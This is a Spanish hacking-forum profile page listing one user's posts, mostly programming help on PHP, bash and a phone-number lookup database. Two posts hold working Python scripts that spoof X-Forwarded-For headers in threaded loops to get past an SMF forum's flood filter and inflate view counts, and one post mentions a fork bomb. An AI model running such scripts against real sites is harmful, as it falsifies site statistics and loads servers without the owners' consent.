Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - hielasangre

#181
Back-end / [PHP][Geo - #RemoteExecution]
Septiembre 29, 2014, 12:54:45 PM
Hace mucho tiempo que existe una web llamada You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login donde uno ingresando la característica y número de un teléfono celular o fijo nos da la información sobre la empresa,localidad,modalidad,etc...
Estos datos se podían bajar en un archivo .xls de la Comisión Nacional de Comunicaciones (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)
Tenia la Base de Datos hace algún tiempo y por fin me decidí a darle un uso al que se le pueda sacar provecho.
Aquí les dejo todo lo necesario para implementar este sistema en sus webs.
Aclaro que el sistema es solo valido para Argentina y también recomiendo incorporar un captcha si es que lo van a dejar para uso publico



PD: La captura es de una versión vieja que tenia y que modifique anoche.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Nota: Voy a actualizar el script porque lo hice a las apuradas. Saludos!

PD: Como dije por ahí , mis post no dicen "Fuente: ESET Latinoamerica xD"
#182
Off Topic / Re:Hay algún CCNA o arriba en el foro
Septiembre 27, 2014, 02:47:04 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
tienes cert CCNA?????

por el momento solo es curiosidad

Te pregunta que deseas saber, no creo que este sea el lugar adecuado para postear el cv de nadie, mas que nada porque no importa .... siempre y cuando te ayuden...
Creo que deberias ser cortez al menos, igual eso esta en cada uno.

Claro qué importa, para estudiar a la par.
No voy a ponerme a estudiar con alguien que sabe menos que yo.
Yo quiero aprender de alguien que sepa más que yo, es por eso que importa el c.v
Suerte con eso entonces.
#183
Off Topic / Re:Hay algún CCNA o arriba en el foro
Septiembre 26, 2014, 11:34:51 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
tienes cert CCNA?????

por el momento solo es curiosidad

Te pregunta que deseas saber, no creo que este sea el lugar adecuado para postear el cv de nadie, mas que nada porque no importa .... siempre y cuando te ayuden...
Creo que deberias ser cortez al menos, igual eso esta en cada uno.
#184
una pelotudez la segunda, es una bomba fork, no ejecutarlo a menos que quieran consumir los recursos de su maquina y autogenerarse un DOS

Edición por Blackdrake: Eliminada la segunda por motivos de seguridad, en efecto era una bomba fork
#185
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Por si sirve de algo me di cuenta que al probar me funciona pero quitando le sudo, pero el problema persiste.

Código: text
 $gestor = popen(' python /var/www/enc/archivo.py', 'r');


le corresponde el archivo:

Código: text
#! /usr/bin/env python

f = open("probando.txt","w")
f.write("hola")
f.close()


aquí todo funciona bien, pero realmente el script que quiero que funcione no funciona.

Código: text
$gestor = popen(' sudo python /var/www/enc/power.py', 'r');


Código: text
#! /usr/bin/env python

import RPi.GPIO as GPIO
import time

GPIO.setmode(GPIO.BOARD)
GPIO.setup(18,GPIO.OUT)

GPIO.output(18,GPIO.LOW)
time.sleep(3)
GPIO.output(18,GPIO.HIGH)

GPIO.cleanup()


los dos funciona por consola, pero el segundo archivo necesita sudo para funcionar, y parece ser que no puedo hacerlo desde php, ¿alguna manera de solucionarlo?

no es aconsejable darle permisos de  root al usuario de apache, fijate si hacer un binario o algo... contame que intentas hacer a vewr si te puedo ayudar
#186
No me gusta mucho google maps! Conoces Open street map? Buen tip el que pasaste +1 :)
#187
Python / Re:SMF Incorrect Flood Filter Headers
Agosto 23, 2014, 02:33:47 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Genial brother, esto lo usé hace algún tiempo para ganar un concurso en otro foro. Aunque no es necesario complicarse con el X-Forwarded-For, este es el code que usé (lo probé acá en Underc0de y aún funciona) por si le sirve a alguien más para algo.

Código: python

import time
import urllib2


class Pvisits(object):
    def __init__(self, url, nvisitas, delay=0):
        headers = {
            "Referer": url,
            "User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
        }
   
        for x in xrange(nvisitas):
            time.sleep(delay)
            request = urllib2.Request(url, headers=headers)
            obj_web = urllib2.urlopen(request)
            codigo = obj_web.code
            if codigo == 200:
                print obj_web.geturl(), codigo, nvisitas - x
            elif codigo >= 400:
                print "Ocurrio un error:", codigo
                return


Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)


Saludos!

OPAAAAA :D Muy bueno! Hay que estudiar mas SMF me parece entonces :P
#188
Python / Re:SMF Incorrect Flood Filter Headers
Agosto 22, 2014, 08:26:23 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Creo que cualquier código es de agradecer, una cosa que no entendí, ¿que es la cabecera X-Forwarded-For?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#189
Python / Re:SMF Incorrect Flood Filter Headers
Agosto 21, 2014, 11:42:30 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

No lo tomo como insulto, pero ahí lo respondí. Yo mismo se que es inútil, es verdad quizás el post debería ser borrado.. A lo mejor perdí mi tiempo no lo se, pero a lo mejor a otro le guste... En fin es cuestión de gustos! Lo use para un PoC

Como dije, todo va en cada uno.. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias puedo usar el codigo para hacer una aplicacion claro coloco tu credito. Y te paso por MP el source final.


Dale que va, no interesan los creditos! Lo que interesa es que te sea útil!
#190
Python / Re:SMF Incorrect Flood Filter Headers
Agosto 21, 2014, 11:17:49 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy bueno hielasangre!!
Te hago una pregunta, esto genera sobrecarga en el servidor?

Abrazo!
Todo depende de como este configurado, pero si porque son múltiples conexiones! Igual, si tenes un cloudflare en el medio lo mitiga automáticamente :)
#191
Python / SMF Incorrect Flood Filter Headers
Agosto 21, 2014, 10:49:25 PM








Código: python

#!/usr/bin/python
# RemoteExecution
#Autor: Daniel Godoy A.K.A hielasangre

import sys, threading, time, urllib2,re
print "Ingrese URL: "
url = raw_input()
a = b = c = d = 1
count = 0
class SMFPwner(threading.Thread):
  def __init__(self, num):
      threading.Thread.__init__(self)
      self.num = num     
  def run(self):
    while 1:
        global a,b,c,d,count, url
        data = ""
        while 1:
            while 1:
                if d!=250:
                    d+=1
                else:
                    if c!= 250:
                        c+=2
                        d=0
                    else:
                        if b!=250:
                            c=0
                            d=0
                            b+=1
                        else:
                            a+=1
                            b=0
                            c=0
                            d=0
                head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
                headers = { 'X-Forwarded-For' : head }
                req = urllib2.Request(url, data, headers)
                f = urllib2.urlopen(req)
                count += 1
                print "[ Visitando => " + url + " Por " + str(count) +" vez ]"
for i in range(3):   
ta = SMFPwner(i)
ta.start()


Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#192
Dudas y pedidos generales / Re:Inquietud (Curl PHP)
Agosto 06, 2014, 01:20:35 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si ese error de las comillas no lo corregi cuando copie el script y pues la funcion curl en el hosting donde almaceno mi web si esta activo, me a permitido hacer peticiones http a traves de el curl solo que las cookies no logro guardarlas =(

estas seguro que loguea?
Proba con confirmar si loguea en el sitio, si podes dar mas info deciem y te ayudo.


para fb use uno de la red algo asi:
Código: text

<?php
echo 'loading <br/>';
        $login_email = 'usuario';
        $login_pass = 'password';
       
$fp = fopen("fb_cookies.txt", w);
fclose($fp);

echo 'still loading <br/>';
       
if (fb_login($login_email,$login_pass)){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://login.facebook.com/login.php?&next=https://apps.facebook.com/triviacrack/');
curl_setopt($ch, CURLOPT_POSTFIELDS,'charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&locale=en_US&email='.urlencode($login_email).'&pass='.urlencode($login_pass).'&pass_placeholder=&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, str_replace('\\','/',dirname(__FILE__)).'/fb_cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, str_replace('\\','/',dirname(__FILE__)).'/fb_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
$html = curl_exec($ch);

curl_close($ch);

  echo $html;
}

 
function fb_login($login_email, $login_pass){

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://login.facebook.com/login.php?&next=https://apps.facebook.com/triviacrack/');
curl_setopt($ch, CURLOPT_POSTFIELDS,'charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&locale=en_US&email='.urlencode($login_email).'&pass='.urlencode($login_pass).'&pass_placeholder=&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, str_replace('\\','/',dirname(__FILE__)).'/fb_cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, str_replace('\\','/',dirname(__FILE__)).'/fb_cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
$html = curl_exec($ch);
$err = 0;
$err = curl_errno($ch);
curl_close($ch);

if ($err != 0){
echo 'error='.$err."\n";
return(false);
} else {
echo 'fetching..';
return(true);
}

}
?>

#193
Dudas y pedidos generales / Re:Ayuda Codigo Bash
Agosto 04, 2014, 07:40:47 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas hola a todos.

necesito ayuda con un pequeño codigo en bash para que me ayuden a como crearlo. La necesidad es la siguiente]:

tengo Muchos archivos planos con nombres de usuarios entonces necesito que esos nombres de usuarios se guarden en un solo archivo

estaba intentando hacer uno pero entonces me los reemplaza necesito es que todos queden en uno solo Gracias.

A ver lo que tenes hecho, a ver si se puede simplemente modificar ese ;)
#194
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No podrías hacer una excepción y pasarmelo? Me interesa más el código que en si utilizarlo y obviamente ni se me pasa por la cabeza publicarlo...

Un saludo.

acá tenes la ApiWhatsapp portada para php (del mismo grupo del original que portó numeritos)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y acá tenes un proyecto mío , una plataforma diseñada usando la api esa para crear un bot personalizado en php

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

por cierto, el mío está en la rama develop, la rama master tiene el code de fermino.

saludos!

Es buena opcion whatsappi, aunque yo prefiero hacer las cosas por mi cuenta, y tambien creo que estamos laburando en lo mismo xD



#195
Yo la hice en php, y lo tengo funcionando desde hce mucho tiempo, no lo hice publico porque lo va a agarrar cualquier y se va a perder algo que costo mucho



Como mi madre no tiene un celular de alta gama con eso puede escribir desde la web :p

#196
como dato les digo que no se aconseja a usar php_self

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#197
Phreak / Re:Galaxy S3 Tool
Julio 30, 2014, 02:59:53 AM
previamente rooteado el equipo?
#198
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.


yo creo que la debo tener por ahí guardada .. tengo que buscarla tengo como 5 años si revisar mi disco duro portátil y no recuerdo donde guardaba eso, también tengo la tool priv8 del doom team aunque esa si ya están obsoletas xD

Es DOM team, y esta tool que yo sepa es publica desde el año 2006 masomenos xD
#199
Dudas y pedidos generales / Re:Busco Uploader
Julio 20, 2014, 03:41:05 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola amig@s de UnderC0de, ando en busca de un uploader (para subir archivos a una web).

Saludos.


Podrías ser mas especifico?

#200